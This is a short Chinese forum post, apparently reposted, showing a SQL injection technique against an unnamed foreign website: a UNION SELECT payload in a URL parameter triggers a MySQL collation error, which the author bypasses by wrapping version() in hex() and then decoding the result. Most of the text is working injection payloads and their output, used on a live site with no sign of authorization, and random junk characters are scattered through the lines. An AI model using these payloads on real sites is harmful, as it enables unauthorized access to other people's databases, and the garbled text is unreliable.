本文作者:SuperHei
1 ?0 T0 b/ ]+ H. P文章性质:原创1 x/ K+ p* {, i
发布日期:2005-10-18
$ F. F7 I' l5 n6 ]8 f% z测试个国外的站时:' T# `/ {6 |8 ]& r
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
$ y% O+ u z% @8 M7 k! s* L, C2 A5 S返回错误:2 t" H6 [9 b% ?* R. J
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
7 m& z& c( v( YMySQL Error No. 126
7 H2 ?( e; V2 _- q8 |2 W看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。" `7 `$ O4 E: D: j7 s' s# c* V$ `
解决办法:转为其他编码如hex。
% [% A4 k5 Y8 g& f( v( n( t. m, Zurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
# k' ]1 C" I; ~成功得到hex(version())的值为:! |6 _! r- F; A' N
342E312E332D62657461
) b2 ^$ F2 z3 ?7 c3 [7 C回Mysql查询下得到:
. H K) {+ g2 H% X1 U0 y5 Zmysql> select 0x342E312E332D62657461;
6 d' }# O. Q- v) e% ]+------------------------+
3 J2 x. F, b8 n" o| 0x342E312E332D62657461 |6 L, x, {1 W3 K- B# U. U; w
+------------------------+8 N4 w3 ]. R6 J4 O& F- T* v. t
| 4.1.3-beta |
- c% E# ]/ G B' o0 X2 f8 o+------------------------+. E3 W$ D! K: a) c
1 row in set (0.00 sec)$ E4 }/ n8 b# `9 n8 r' ~4 }( f
E8 `; e4 C$ g) O$ |& L9 D- j
|
发表于 2012-9-15 14:04:54
收藏
支持
反对